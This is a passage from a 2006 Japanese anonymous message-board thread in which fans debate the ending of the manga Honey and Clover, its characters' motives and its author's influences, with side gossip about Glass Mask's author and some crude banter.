359 :花と名無しさん:2006/08/01(火) 01:01:08 ID:???0
>>356
なかったことになってたらそれはそれでなんか嫌かも

360 :花と名無しさん:2006/08/01(火) 01:01:16 ID:???0
そういや、そのオリジナルの801は
商業誌で続きが載ってた。
フェリーで旅行するヤツ。

361 :花と名無しさん:2006/08/01(火) 01:04:16 ID:???O
昔、ちょっとエッチな水着きてたのに、今は隠して清純アイドルしてるって感じなのか

362 :花と名無しさん:2006/08/01(火) 01:04:50 ID:???0
なかったことになってたら10巻買う

363 :花と名無しさん :2006/08/01(火) 01:06:36 ID:???0
ガラかめはなかったことになったのが多すぎて
もはやパラレルワールドになり破綻している

364 :花と名無しさん:2006/08/01(火) 01:07:00 ID:???O
>>356
そういえば真澄様の婚約者の自殺未遂もなかったことになってたような

365 :花と名無しさん:2006/08/01(火) 01:07:26 ID:???0
ナルトって最近の漫画だよね。
ハチクロ連載スタートしてからも同人やめてなかったのかな?

あぁでも、集英社は同人には厳しそうだけど
(別マの河原和音さんも元同人女だけど
 別マでデビューする時に、同人は完全に辞めた)
キューティコミックス(宝島社)なら
同人やりながら少女漫画でもプロデビューしても
編集者が怒らないような感じがするね。


366 :花と名無しさん:2006/08/01(火) 01:09:01 ID:???O
同人のことをなかったことにしたように、しゅうはぐ無かったことにするかもよ?

367 :花と名無しさん:2006/08/01(火) 01:09:12 ID:???O
なかったことというよりも
あまりの昼メロ展開に本人がアチャーと思ったんじゃないか<ガラかめ

368 :花と名無しさん:2006/08/01(火) 01:14:53 ID:???0
ガラかめなんで長いこと休載してたんだろう

369 :花と名無しさん:2006/08/01(火) 01:15:50 ID:???0
>>368
マジレス
作者が宗教に走ったから。


370 :花と名無しさん:2006/08/01(火) 01:19:51 ID:???0
>>368
作者の中の人が宗教に嵌ったというか自分が教祖になりかけ。
修行が出来上がるまで他に気が散るのを神様が禁止してるので描けないの。

371 :花と名無しさん:2006/08/01(火) 01:20:10 ID:???0
偶然オークションで見つけたんだけどテニプリも描いてるらしい。
現物は拝んだことがないので内容はよく知らない。

372 :花と名無しさん:2006/08/01(火) 01:21:28 ID:???0
面白いことになってるんだなw>ガラカメ作者

373 :花と名無しさん:2006/08/01(火) 01:21:50 ID:???0
ゲゲ…そんな理由だったんだ<がらかめ

374 :花と名無しさん:2006/08/01(火) 01:22:23 ID:???0
微妙にガラかめスレになってるなw

375 :花と名無しさん:2006/08/01(火) 01:25:37 ID:???O
うみのセンセはブレやすい漫画家なんですね。
そんでもってミーハー。
周りのいろんなもんからの影響がモロに来るタイプ。
そういえばがゆんも日記本読むと分かるがミーハーだったな。

すれ違いだけど、アマテラス再開しないかな……<美内の宗教漫画

376 :花と名無しさん:2006/08/01(火) 01:25:48 ID:???O
レスがのびたと思ったら。

たぶん、はぐより修は先死ぬよね?どーするんだろ。
70歳くらいで、竹本くぅん…修ちゃんがぁ!なんて泣き付いたら恐怖

377 :花と名無しさん:2006/08/01(火) 01:28:47 ID:???0
たけのこがその頃まで独身だったら泣ける

378 :花と名無しさん:2006/08/01(火) 01:29:41 ID:???0
ガラかめは作者が宗教に走った
(作者自身が教祖?な宗教)せいで
新刊は一生出ないだろうと思われてたから
新刊出たことにファンもびっくりしてたよね。

自分はそこまでガラかめの大ファンじゃなかったんだけど
つい、祭りに乗ってコミックス買ってしまった。



ところで↓ジョージ朝倉(少女漫画家)のガラスの仮面同人サイト
「ガラスの仮面(バケヅラ)」
ttp://www.jazze7.com/glass/
ここ面白いよ。
ただのギャグサイトで、ホモとかエロはないので安心して読める。

379 :花と名無しさん:2006/08/01(火) 01:31:27 ID:???O
>>377
独身でもいいが童貞だったら

380 :花と名無しさん:2006/08/01(火) 01:34:11 ID:???0
でもしみじみ考えると
別に童貞でもどうでもよくね?
犯罪犯さなきゃ

381 :花と名無しさん:2006/08/01(火) 01:35:28 ID:???0
処女や童貞のまま死ぬと妖精になれるんだよ(川原泉ネタ)

382 :花と名無しさん:2006/08/01(火) 01:36:36 ID:???0
30超えたら妖精になれるんだよね
森田さんて(ry

383 :花と名無しさん:2006/08/01(火) 01:38:29 ID:???0
花本先生てホモ要員ではなかったんだね。ちょっと安心したよ。
アニメで彼の大学時代のエピソードがやってて、
階段に、原田と2人で並んで座ってるときの表情,出で立ちがヤヴァめだったんで
(原作にあんなカットあったか?)
てっきり・・・。

384 :花と名無しさん:2006/08/01(火) 01:39:56 ID:???O
>>382
森田は童貞じゃなさそう

385 :花と名無しさん:2006/08/01(火) 01:41:33 ID:???O
>>380
それ毒男板あたりで聞いてみ?

386 :花と名無しさん:2006/08/01(火) 01:44:25 ID:???0
今の日本だと、犯罪者より童貞の方が格下だろう。
特に女の童貞嫌いは半端無いぞ。

387 :花と名無しさん:2006/08/01(火) 01:44:27 ID:???0
お前聞いて来いよ

388 :花と名無しさん:2006/08/01(火) 01:45:22 ID:???0
>>386
そんなことはない

389 :花と名無しさん:2006/08/01(火) 01:45:25 ID:???O
原田花本はそっちのにおいもする描き方だと思ったよ。
なんかリカと共に男女の仲を超えた関係みたいな

390 :花と名無しさん:2006/08/01(火) 01:46:24 ID:???0
でもプロの人に相手してもらえる分
童貞より処女のほうが比率多そうだねー

391 :花と名無しさん:2006/08/01(火) 01:47:44 ID:???O
>>389
わかるが、やっぱり過去を聞くと素直には受け取れないね


392 :花と名無しさん:2006/08/01(火) 01:48:56 ID:???0
>>389
>男女の仲を超えた関係

なるほどね…。
バナナフィッシュの主人公2人みたいな、
「魂の結びつき」とかそんな感じか・・・?

393 :花と名無しさん:2006/08/01(火) 01:48:57 ID:???0
修にその気があったとしても原田に拒否権があるからw


394 :花と名無しさん:2006/08/01(火) 01:48:58 ID:???O
>>387
嫌だ、言い出しっぺのお前が行け

395 :花と名無しさん:2006/08/01(火) 01:49:48 ID:???0
ハチクロって男読者にも人気があるので
てっきり
「あー。はぐみがロリだから、ロリコンオタクに人気あるんだろうな。
 あと、リカが綾波系だから、綾波系に萌える男にも人気でそう」
と思ってたら、男読者ははぐとリカはスルーで
山田あゆ萌えがほとんどだったので意外に思った。

はぐみは実際の年が成人女性だから
ロリ受けはしなかったのかな。
あと、リカも実際の年齢が30女だから
「いくら綾波系でも、30台ヲバは勘弁」と
受けなかったのかも。
キモオタには女の年齢が重要なようだから。
「いくら綺麗でも25歳以上は対象外」
「30女というだけで勘弁」
みたいな書き込みをよくみかけるし。


396 :花と名無しさん:2006/08/01(火) 01:50:20 ID:???0
修個人としては「原田リカ修」の3人が完璧だったんだと思う
だからそれに囚われて青春もどきから抜けられない

397 :花と名無しさん:2006/08/01(火) 01:51:14 ID:???0
2次元に年齢関係なし

398 :花と名無しさん:2006/08/01(火) 01:51:33 ID:???0
だから山田の内面はとっても嘘臭い。
キモオタ専用萌えキャラと同じ眷属で。

399 :花と名無しさん:2006/08/01(火) 01:51:34 ID:???O
>>392
ガラかめもあったなそれ

400 :花と名無しさん:2006/08/01(火) 01:52:06 ID:???O
>>392

でもアッシュと英二の場合はアッシュの過去ありき+英二のほんわかして奥手な性格があってだから、説得力があったし感動したよ

原田はムツゴロ気質でひきつける人というのはわかるが、イマイチ臭の性格がつかめなかった

401 :花と名無しさん:2006/08/01(火) 01:53:07 ID:???0
自分の中で花本修司というキャラがなんだかすごく複雑になってきた
・・・
奴の心に味がついているとしたら
一体どんな味なんだろう・・・

402 :花と名無しさん:2006/08/01(火) 01:53:37 ID:???0
ぽえーむ

403 :花と名無しさん:2006/08/01(火) 01:53:58 ID:???0
カボミント

404 :花と名無しさん:2006/08/01(火) 01:54:50 ID:???0
境目は一体いつ頃だったんだろう
高校生はぐを手元にゲットした時からだと予想してみる

405 :花と名無しさん:2006/08/01(火) 01:55:35 ID:???O
某山本みたいに18になったら解禁!みたいな

406 :花と名無しさん:2006/08/01(火) 01:56:19 ID:???0
自分は
「はぐの入院」でガチだと思ってる

407 :花と名無しさん:2006/08/01(火) 01:56:29 ID:???0
そりゃ恥ずかしいわなw

408 :花と名無しさん:2006/08/01(火) 01:56:51 ID:???O
>>401
凡人だから竹本に近そうだけど、竹本のような才能への嫉妬心みたいなのは無さそうだしね
つかめない

黒子をいきなり舞台にひきずりだすからあやふやさが際立つんだよ

409 :花と名無しさん:2006/08/01(火) 01:59:26 ID:???0
>>408
>才能への嫉妬心みたいなのは無さそうだしね

“「才能を持てる者」と自分を同一化しよう”という心理が
働いているからこそだろうね。

410 :花と名無しさん:2006/08/01(火) 02:01:04 ID:???0
>>396
だとしたら大昔の萩尾モトの「まりえ(漢字失念)」みたいだな
(このスレで知ってる人居なかたらスマソ)
あれも美大が舞台で男二人と女一人の3人で
最後は死ななかったけど強引だった片方がまりえを連れて逃げた
残された男はまりえのイメージに囚われたまま作品を造り続け中年になる…
そして時折思い出すのは学生時代のこと
「3人で完璧だった。,円の広がりは宇宙の外まで広がった…」


411 :花と名無しさん:2006/08/01(火) 02:02:27 ID:???0
うわぁ・・・まんまやな。

412 :花と名無しさん:2006/08/01(火) 02:04:05 ID:???0
>>403
SOREDA!!

413 :花と名無しさん:2006/08/01(火) 02:06:58 ID:???0
>409
その論理でいくと結構痛々しいやつ…だと思う

414 :花と名無しさん:2006/08/01(火) 02:08:14 ID:???O
>>410
女男男で3人ならそうなるわな〜とても自然だ。
リカがあんな美人で何もないから、週は枯れてるのかといわれるんだよ!

415 :花と名無しさん:2006/08/01(火) 02:11:10 ID:???O
修って、原田やリカはぐみみたくカリスマ性も才能もある人たちのそばにいて、嫉妬心がないのはチョイと不自然。

416 :花と名無しさん:2006/08/01(火) 02:12:06 ID:???O
>>414
原田の方が好きだったんじゃないか?
もともと原田と仲良くなったわけだし

417 :花と名無しさん:2006/08/01(火) 02:16:02 ID:???0
「歪み、屈折」が、竹本の場合はわりと表面的なものなのに対して(わかりやすい「嫉妬」)
修の場合は深層心理にまで及んでいて、
それを抑えつけるかのように「同一化しよう」という心理が働いているから
ややこしいんだろう。


418 :花と名無しさん:2006/08/01(火) 02:16:42 ID:???O
>>416
でめ一つ屋根の下で友達カッポルと暮らしたら、すきじゃなくても催さないのかね。

419 :花と名無しさん:2006/08/01(火) 02:17:01 ID:???0
最初はムツゴロウに惹かれたけど、二人になってからはリカを支えたかったんだ
だけど竹本じゃないけど、天才の存在感には敵わないことを悟って
リカのことは諦めて自分を慕うパグに目をつけたんだよ

420 :花と名無しさん:2006/08/01(火) 02:21:20 ID:???0
>>410
その漫画読んだことないけど、その設定だけ聞いたら
ハチクロの臭×原口×リカの人間関係にそっくりだね。

ウミノさんて色々なものに影響を受けやすい人だから
萩尾望都のその漫画にも、もしかしたら影響を
受けたのかもしれないね。

あと、他にも古い少女漫画に
ハチクロは影響受けてるんじゃないかという
発言があったよね。吉野朔美だったか。
その漫画も私は読んだことなくて知らないんだけど。

421 :花と名無しさん:2006/08/01(火) 02:21:36 ID:???0
9巻だけを読むとはぐと将来一緒になるのは修司にしか見えないんだよな…
はぐが「一緒に闘える相手」と考えていたのは竹本・森田ではなく修司だし。
はぐへの恋心も>>406さんの通り入院中だと思う。
父親が見舞いに来たあとのはぐを見て女性として意識したとか。
要は作者が描いてないだけで。

番外編でそのあたりもハッキリしてくれるといいけど



422 :花と名無しさん:2006/08/01(火) 02:26:36 ID:???O
>>417
それ、アマデウス何やらだっけ?

423 :花と名無しさん:2006/08/01(火) 02:27:09 ID:???0
>>417
ナルホド。
同一化することで、根底にある羨望や嫉妬を昇華させようという・・・
ほんと、複雑だねぇ

>>420
ウミノさんは、24年組世代に影響受けた世代だよね。たしか。

424 :花と名無しさん:2006/08/01(火) 02:30:01 ID:???0
よそからの影響を受けるのは人間なら当たり前だから
いわゆる「パクリ検証厨」みたいなことは言いたくないけど
ウミノさんはあからさまに影響を受けすぎだよなぁ…。

425 :花と名無しさん:2006/08/01(火) 02:31:13 ID:???O
最後の最後でライトセーバーだもんね…

426 :花と名無しさん:2006/08/01(火) 02:33:52 ID:???0
ビームサーベル(つか、ルーカスデジタルアーツ)のくだりは
素直に笑えた。

427 :花と名無しさん:2006/08/01(火) 02:37:38 ID:???0
クローバー入りハチミツサンドには
思わず乾いた笑いがこぼれたが。

428 :花と名無しさん:2006/08/01(火) 02:40:28 ID:???O
>>427
某スレでは皆そこで大号泣だそうで。




429 :花と名無しさん:2006/08/01(火) 02:45:26 ID:???0
>>422
根底にあるのものは一緒だろうけど、サリエリの場合
修と違って「対象(才能を持つ者)の破滅」にその昇華を見出そうとしてしまってる。
心理ベクトルの方向性に違いがある。


430 :花と名無しさん:2006/08/01(火) 02:48:20 ID:???0
>>428
そ、そうなんだ・・・。
まぁ感じ方は人それぞれだし、な。

431 :花と名無しさん:2006/08/01(火) 02:54:45 ID:???O
>>428
筍可哀想の方の号泣じゃなくて?

432 :花と名無しさん:2006/08/01(火) 02:55:31 ID:???O
あのスタジオ外国設定だけど、ジブリっぽく感じた

お前の作品が似合う、宮崎駿を越える監督になるからさ、
そしたら一緒に暮らそう
・・・何てねw
いやー、マルチ解釈Endで本当によかった。
というか森田はぐ竹本が、時かけの功介真琴千昭みたいな黄金三角形なんだから、先生は割り込んじゃいかんよ。
四つ葉つくるとしたら+あゆだし。

433 :花と名無しさん:2006/08/01(火) 02:56:00 ID:???0

ハチクロの魔法が解けてなかったら…

434 :花と名無しさん:2006/08/01(火) 02:56:45 ID:???O
>>431
感動的だった〜作者の思い入れタップリの素晴らしい最終回でした!という意味の号泣



435 :花と名無しさん:2006/08/01(火) 02:59:00 ID:???0
薄っぺららい後付けだなぁとしか思えなかった>ハチクロサンド
汚れてしまった・・・ 

436 :花と名無しさん:2006/08/01(火) 03:02:09 ID:???O
>>435
ここで、ハチミツとクローバーはウミノ先生が好きな曲をつなげただけと知って、なおさら後付けだな〜とおもたよ

知らなくてもいくらなんでも直喩すぎるだろと萎えたけどさ

437 :花と名無しさん:2006/08/01(火) 03:03:34 ID:???0
ウミノインタビュー

「私は自分の漫画の中で全員で海に行かせてあげられなかった。
ホントは描きたかったけど、どうしても入れられないとこまでストーリーが進んでしまったので。
映画の中では、海に行って、記念写真を撮ってくれた。
うちの子たちにはさせてあげられなかったことが、ここでかなえられているので、是非、そこを見てほしい。」

キモイよ

438 :花と名無しさん:2006/08/01(火) 03:05:12 ID:???0
>>428
ミクシじゃなくて、2ちゃん内でも?
どこのスレだろう?
と、思って検索してみたけど
2ちゃん内だけでもハチクロスレってこんなにあるのね↓
http://ttsearch.net/s2.cgi?k=%83n%83%60%83%7E%83c%82%C6%83N%83%8D%81%5B%83o%81%5B&o=r
号泣されてるスレ探しに行くのまんどくさいからいいや。

439 :花と名無しさん:2006/08/01(火) 03:11:29 ID:???0
>>437
 
それがマジならもうダメだな。ダメな人だな。
 

440 :花と名無しさん:2006/08/01(火) 03:11:42 ID:???0
● ハチミツとクローバーを酷評したら友人がマジギレした(4)
スレタイに吹いた

441 :花と名無しさん:2006/08/01(火) 03:12:36 ID:???0
437はコーラスに載ったインタビューだよ

442 :花と名無しさん:2006/08/01(火) 03:15:25 ID:???0
>>437
ほんと、どんな相手に対してもノリが同人なんだねw

443 :花と名無しさん:2006/08/01(火) 03:24:23 ID:???0
アニメスレ見てきた。
リカが「ババァ」「オバサン」扱いだった。
やっぱり二次元でも30代女はキッツイのか。

「ババァとストーカーの恋愛はどうでもいい」
という書き込みも笑った。

444 :花と名無しさん:2006/08/01(火) 03:27:57 ID:???O
>>438
いや、ミクだよ。
みんなに読んでほしいよ。
感じ方はそれぞれとは思うけどさ…

445 :花と名無しさん:2006/08/01(火) 03:30:07 ID:???O
30になるとそんなに女ってババア認定受けるのか?

446 :花と名無しさん:2006/08/01(火) 03:38:31 ID:???0
そういう世界もある ってこった

447 :花と名無しさん:2006/08/01(火) 03:39:55 ID:???0
>>445
2ちゃんにいるキモヲタの間では完全にババア認定。論外扱い。
というか、24歳以内じゃないと女扱いされていない。

キモヲタだからかえって反動で
女の理想が高くなってるんだと思うんだよね。
「ウエスト60以上の女はデブ!」
「腐女子はアンダーバスト70以上のデブばかり!」
みたいな書き込みをしてたヤツもいたし。


448 :花と名無しさん:2006/08/01(火) 03:40:49 ID:???0
ミクシのどのカテ?
URL貼ってくれるかヒントキボーン。

449 :花と名無しさん:2006/08/01(火) 03:43:40 ID:???O
>>448
ハチクロでコミュ検索して一番人数が多いヤツ

450 :花と名無しさん:2006/08/01(火) 03:46:51 ID:???0
>>449
ありがと。それだけわかれば探せる。

451 :花と名無しさん:2006/08/01(火) 03:50:18 ID:???0
>>440
そのスレの>>4 ・・・切なすぎる

452 :花と名無しさん:2006/08/01(火) 07:00:33 ID:???0
とにかく、女が両手に男っていう三角関係が好きなんだね、この人。
はぐ・山田・りかともに同性の友達がいないのがよくわかるよ。

453 :花と名無しさん:2006/08/01(火) 07:03:36 ID:???O
>>452
はぐと山田も微妙に友達じゃないしね

454 :花と名無しさん:2006/08/01(火) 07:06:18 ID:???0
>>452
とりあえず、モテないんだな、おまえは

455 :花と名無しさん:2006/08/01(火) 08:17:38 ID:???0
>>454
信者乙

456 :花と名無しさん:2006/08/01(火) 08:42:22 ID:???O
修は好きだが はぐは最終回で ガッカリした

457 :花と名無しさん:2006/08/01(火) 08:47:05 ID:???O
>>456
偽善の嵐だたね

458 :花と名無しさん:2006/08/01(火) 08:56:51 ID:DUXc+5XR0
純粋 クローバーのハチミツ
http://www.sakura-shop.co.jp/shop/index.html#clover


クローバーのハチミツ入りサンドイッチならともかく
クローバーの葉っぱ入れたサンドって食って大丈夫なのか?
腹壊さないか?

459 :花と名無しさん:2006/08/01(火) 08:58:52 ID:???O
>>458
新幹線にはトイレついてるから

460 :花と名無しさん:2006/08/01(火) 09:05:28 ID:???0
>>392
どこだったか忘れたけど漫画分析系のスレに英二は親の代用だって書かれてた。
子供(アッシュ)を丸ごと受け入れる母性と
子供(アッシュ)の性を脅かさない父性を併せ持つ人物が英二
それと英二が自分を脅かさない凡人であることがアッシュ=ヨシダさんを癒せるとか。
ウミノさんの場合、とにかくかまって欲しい愛して欲しい。

親(権威)と確執のあるヨシダさんと
親(保護者)に執着するウミノさん。

ウミノさんは保護者が自分にとって男であっていいと思ってるから修の変化やはぐへの執着に萌えられる。
ヨシダワールドに修がいたら悪で敵で軽蔑すべき人物として描かれそう。

461 :花と名無しさん:2006/08/01(火) 09:09:35 ID:???O
>>460
ウミノさんは親子の癒着をよしとしてるものね。しかも性的意味オッケーで

吉田さんて親と問題あったの?

462 :花と名無しさん:2006/08/01(火) 09:20:31 ID:???0
>>461
仲が良くないってインタビューで言ってたとか
漫画も親に振り回される子供の話が多いよね

463 :花と名無しさん:2006/08/01(火) 09:24:38 ID:???O
>>462
へぇーそういや英二の家も親子関係が微妙だったよね。

ラバーズキスはかなりキツイ設定だったし。
なんか納得、作者のバックグラウンドが影響してんだねー。



464 :花と名無しさん:2006/08/01(火) 09:31:03 ID:???0
>>317
冷静に考えたら確かにその通りだと思う。
役者に萌えてグダグダになって終わらせたとか、鬱になって適当に終わらせたとか
飽きたとか、あれはそんな類の終わり方じゃないんじゃないのと
185で言いたかったんだけどちょっと調子に乗りすぎました。

最終回はデッサンや描き込み具合もかなり気合入ってたしたけのこの語りも良かった。
適当とか飽きたとか考え無しに展開を全て変えてとかじゃなく、
作者が真剣に取り組んで出来上がったラストだったと思う。
内容に対して色々あるだろうけど取り組んだ姿勢をけなすのはどうかと思ったわけで。
まぁ最終回だから力入ってるのは当たり前だし、絶対に適当でも飽きてもいないって
言い切れるわけでもないんですけどね。ていうかダヴィンチも読んでないし。

>>204
ストーリーを批判するなとは言っていない。
おれだって修はぐがセクるかと思ってた時期はキモかった。

465 :花と名無しさん:2006/08/01(火) 09:37:49 ID:???O
>>464
まーでも真剣に取り組んで最終回を描いたのかはうみのさん本人しか分からないしね。

464はそう信じてればいいんじゃないのかい。

どう感じとるかは人それぞれだからねえ。

466 :花と名無しさん:2006/08/01(火) 10:23:07 ID:???0
9巻どこにも売ってない。。

467 :花と名無しさん:2006/08/01(火) 10:25:34 ID:???0
>>464
作者が飽きていなくても他の現場スタッフ(編集・アシ・担当)のモチベーションが著しく低くて
それに作者が引きずられることはありうるな。
商業漫画は同人誌と違って(大作家クラスでないと)作家一人でどうにかできる類のものではないから。

たぶん大人の事情で上から勝手に連載終了の時期を決められたのも事実だろうし、
他に消化したい伏線やイベントがあるのに打ち切りに近い形で終わったのも事実なのだろう。
海発言を好意的に受け取るならば、つまりはそういうことなのだろうと。

ただ、次からは集英社も個人ではなく原作者付きで描かせてほしいとは思った。
絵と見せ方は上手いのに、ストーリーと構成力のせいでそれを殺しかねないから。

468 :花と名無しさん:2006/08/01(火) 10:41:44 ID:fCR8dPyfO
ハチクロの9巻さがして本屋を4件めぐったんだけど、みんな売り切れ…。発行部数少なかったのかな?

469 :花と名無しさん:2006/08/01(火) 10:44:00 ID:???0
>>467
>たぶん大人の事情で上から勝手に連載終了の時期を決められた

人気ある漫画は長々と引き伸ばさせる集英社が
そういうことするんだろうか?とちょっと疑問なんだけど…

でもコーラス編集長頭おかしいから
ありえない話でもないよなぁ。
過去に一条ゆかりの「天使のツラノカワ」って漫画を
大人の事情(別の漫画を新連載させたい)で打ち切りにさせて
最終回の1つ前と最終回のストーリーが
メタメタにされたことがあるし。

470 :花と名無しさん:2006/08/01(火) 12:47:25 ID:???0
これは番外編で一気に何かを語る気かも分からんね。
藤原デザイン視点で中心キャラの後日談を山ほど並べるとか。

471 :花と名無しさん:2006/08/01(火) 12:52:20 ID:???O
でもこれ以上先の未来は
作者と言えどもあまり描けなさそう
子が家を出た感じ
手紙は来るけどそれだけみたいな

472 :花と名無しさん:2006/08/01(火) 13:28:56 ID:???0
はぐの手は治らないんじゃないべかな
このまま修司の女として普通の人生を歩みそう。
いろいろ後悔して、
そんで早く死ぬのでは…
はぐの人間的キャパはそこまでなのかも。

473 :花と名無しさん:2006/08/01(火) 13:34:01 ID:???0
主要キャラの一生分のエピソードはもう頭にあるって言ってたんでしょ。

主要5人は誰同士もくっつかないと決まってたんじゃないかな。
もう会えないよ〜からまた会えるよ〜になっただけでも良かったよ。

474 :花と名無しさん:2006/08/01(火) 13:36:53 ID:???0
何でも良いから修復師見習い兼料理番の未来をどうにかしろ。

475 :花と名無しさん:2006/08/01(火) 13:38:45 ID:???0
たけのこのみはもう会えない気がする。
あんまり不憫なので幸せに満ちた将来を設定してあげてください
子沢山とかね

476 :花と名無しさん:2006/08/01(火) 13:42:06 ID:???0
修はぐのこと考えても未来に隙間風吹いて見えるし
たけのこは寂寥感たっぷりだし
森田は派手だけどなんだか薄そうだし
トラウマや肉親欠損のない真山田が
普通に生きていきそうってくらいしか想像できん。

477 :花と名無しさん:2006/08/01(火) 13:52:18 ID:???0
竹本の場合は何万人に一人しかいないような突き抜けた才能の持ち主に囲まれてたから
才能コンプに陥っていただけで、社会の荒波に揉まれれば一番成長しそうなタイプだと思う。
だから、最終的には平凡だけどあの中では一番幸せになっているんじゃないかと。

他は色々な意味で頂点とどん底を行き来しそうな人生を歩みそうなイメージがあるな。
特にはぐと森田は幸せになることを自分の才能によって阻まれそう。
修もはぐが芸術を極める道を選んだがためにそうなることを一番恐れていたわけだし。

478 :花と名無しさん:2006/08/01(火) 13:56:58 ID:A/3Qq+dV0
名前かぶりすぎ
竹本
花本

 原田
 山田
 山崎
真山

479 :花と名無しさん:2006/08/01(火) 14:03:51 ID:???0
ネットの書店員の日記によると、9巻重版は8月3日にできあがり。
10巻は、9月8日に緊急発売らしい。
商売として当然なんだが、映画とアニメのやってるうちに、って感じ?
(ほめてます)

480 :花と名無しさん:2006/08/01(火) 14:10:38 ID:???0
てことは、スピンオフは10巻には収録されないのかな?
そのかわりYYに載った読み切りでも入れるんだろか??

481 :花と名無しさん:2006/08/01(火) 14:11:29 ID:???0
>>479
書き下ろしが入ったらいいのになー

482 :花と名無しさん:2006/08/01(火) 14:16:52 ID:???0
才能による不幸というのは
森田父のように凡人に足を引っ張られるとか
森田のようにそうなりたくなくて道化を演じる孤独とか
はぐのように期待に応えようとするためのプレッシャーとか

そう考えると修ははぐのためになってるんだろーか
最終局面に至ってもあまり抜本的解決はなされてないので
オチてない気がしてしまったんだよね。

483 :花と名無しさん:2006/08/01(火) 14:17:35 ID:???0
YYに載った読み切りってどんな話?

484 :花と名無しさん:2006/08/01(火) 14:21:04 ID:???0
>>477
でもたけのこはまじめすぎる

485 :花と名無しさん:2006/08/01(火) 14:25:30 ID:???O
>>473
それは崩壊してんじゃないかななんとなく
キャラが自由に動き出しちゃえば予定通りにはいかないよ
修の暴走やその他の抵抗みたいにね
だから日記あんな苦しそうだったんだろう
スケッチブックボイジャーっていう劇みたいな状態

486 :花と名無しさん:2006/08/01(火) 14:26:33 ID:???0
>>472
最終回でずいぶん回復してた。
怪我後数ヶ月で自転車二人乗り可能。
しかも怪我した手だけでつかまること可能。


487 :花と名無しさん:2006/08/01(火) 14:30:24 ID:???0
>>483
ハンドメイドで一点物のバッグを作ってる女の子の話だったと思う
YYでハチクロ連載再開前に載った
巻頭のカラーが綺麗だった記憶が

488 :花と名無しさん:2006/08/01(火) 14:37:45 ID:???0
森田は復讐計画の反動で子供っぽい関係に依存するモラトリアムを終えて
お仲間(CG屋)のところに行けたよ。
映画は総合芸術だから、何でもできるからやっぱり合ってると思う。
はぐと竹本のことは心配だよ、もともと神経が細い子たちだから。

489 :花と名無しさん:2006/08/01(火) 14:38:11 ID:???O
「スピンオフ」で主役が竹本だったら
正式な主人公降板だね…。

でも一番続きが見たいのは竹本くんだな。あの子には未来がある。
ほかはまだ20代30代なのに人生の先の先迄決まった感じ。

490 :花と名無しさん:2006/08/01(火) 14:40:04 ID:???0
修復士のとこに永久就職って、なんかもう終わった感じするもんね・・・

491 :花と名無しさん:2006/08/01(火) 14:44:25 ID:???0
>>477
親身な親方とか気のいい先輩たちに、厳しくも優しく揉まれて
いい修復士になりつつあって、ふと学生時代を振り返って
「あの恋は俺の青春そのものだった」とか臭いポエムを
ささやきつつもあの時代に後悔はなく、むしろ現在を頑張る
ための糧になっている。
そして決して後ろ向きにならず、次の恋を否定しない。

…なんて暮らしぶりだといいな、と思う。

492 :花と名無しさん:2006/08/01(火) 14:58:25 ID:???0
しんさんみたいになってられたらいいね

493 :花と名無しさん:2006/08/01(火) 15:05:36 ID:???0
竹本のみ大人になったから青春抜けられる。
他はドラマティックに生きていく気が・・・

494 :花と名無しさん:2006/08/01(火) 15:06:59 ID:???O
昼メロでしょ

495 :花と名無しさん:2006/08/01(火) 15:10:10 ID:???0
>>494
これのこと?

208 :花と名無しさん [sage] :2006/07/28(金) 10:54:31 ID:???0


嫉妬のためストーカー気質気味の野宮におびえる山田
不倫にはしるはぐ
倦怠期の真山
陰鬱な作業者の仮面の下、性に飢える竹本
クスリに汚染された森田

この五人が再び出会う――――――ハチクロリターンズ2008。
          
     ―――青春だって、大人になる。



496 :花と名無しさん:2006/08/01(火) 16:01:50 ID:???0
かつての自分の経験を生かして野宮を正常まで戻すが、
昔の恥ずかしい行動が全て嫁にバレて、以来毎晩言葉責めに晒されてむしろ気持ち良い真山。
 
筋肉ムキムキ性欲満タンではぐを脳天まで貫きまくり、悲願達成した竹本。
 
森田をどうにかしようとしてミイラ取りがミイラになる花本。
 
 
以上で万事解決。

497 :花と名無しさん:2006/08/01(火) 16:05:03 ID:4eUmRFGl0
「ガラかめ」

という単語を最初に見て、

「ガラパゴスの亀」

というタイトルの略だと思ってしまったorz

498 :花と名無しさん:2006/08/01(火) 17:09:56 ID:???0
普通、サンドイッチをめくって中身見るもん?

499 :花と名無しさん:2006/08/01(火) 17:12:03 ID:???0
他人から貰ったら見るかもな

500 :花と名無しさん:2006/08/01(火) 17:16:59 ID:???0
あの学校の後輩が自分探しに出かけて竹本に出会う話とかw

501 :花と名無しさん:2006/08/01(火) 17:32:38 ID:???0
最終回ってまじ?知らなかったwww

502 :花と名無しさん:2006/08/01(火) 17:38:24 ID:???0
>>498
普通は見ないけど、はぐみは
激マズの創作料理を作る女だから
身の危険を考えると、中身を確かめるんだろ。

503 :花と名無しさん:2006/08/01(火) 18:04:23 ID:???0
ハチミツとクローバーのサンドイッチなんて一見すると
何も挟まってないように見えるから
「なんじゃこりゃ」と思って見る。

504 :花と名無しさん:2006/08/01(火) 18:24:47 ID:???0
臭ちゃんには「人生ください」
森田には「ずっとみてる」
竹本にはハチミツとクローバーサンドプレゼント。

はぐみは 
3人の男のこころを ゲットした!

505 :花と名無しさん:2006/08/01(火) 18:36:40 ID:???0
結局竹本と森田の仲違いはそのままか・・・

最後の最後まではぐみが怒られたり叱られたりしてるところを見た事が無かったな

506 :花と名無しさん:2006/08/01(火) 18:40:43 ID:???0
ハチクロサンドって修も味見したんだろうな

507 :花と名無しさん:2006/08/01(火) 18:56:40 ID:???0
森田の覗き部屋をうれしそうに見ているはぐを見つめたり
竹本にハチクロさんどを作るところを(多分)見ていたりする時の
臭の心境はいかがなものなのだろうか。

508 :花と名無しさん:2006/08/01(火) 19:09:21 ID:dcK+LfOZ0
デビュー作がヒットしちゃって、
ハチクロ終わっちゃったら、次回作に妙な期待がかかって大変そうな感じ?

509 :花と名無しさん:2006/08/01(火) 19:09:52 ID:???O
想像したくない

510 :花と名無しさん:2006/08/01(火) 19:11:03 ID:???0
今日、やっとコーラス買って読んだら、いきなり最終回でびっくりした。
終わりが近いとは思ってたけど、まだあと数回はあると思ってたのに。
予告で「最終回」とか書いてあったっけ?

511 :花と名無しさん:2006/08/01(火) 19:14:35 ID:???0
>>510
表紙にすら書いてない

512 :花と名無しさん:2006/08/01(火) 19:18:43 ID:???0
>>505
甘やかされてたからなあ

513 :花と名無しさん:2006/08/01(火) 19:32:37 ID:???0
>>505
商店街でクリスマスのバイトした時くらいかね。
はぐみが軽くゴルァされてたのは。

514 :510:2006/08/01(火) 19:33:47 ID:???0
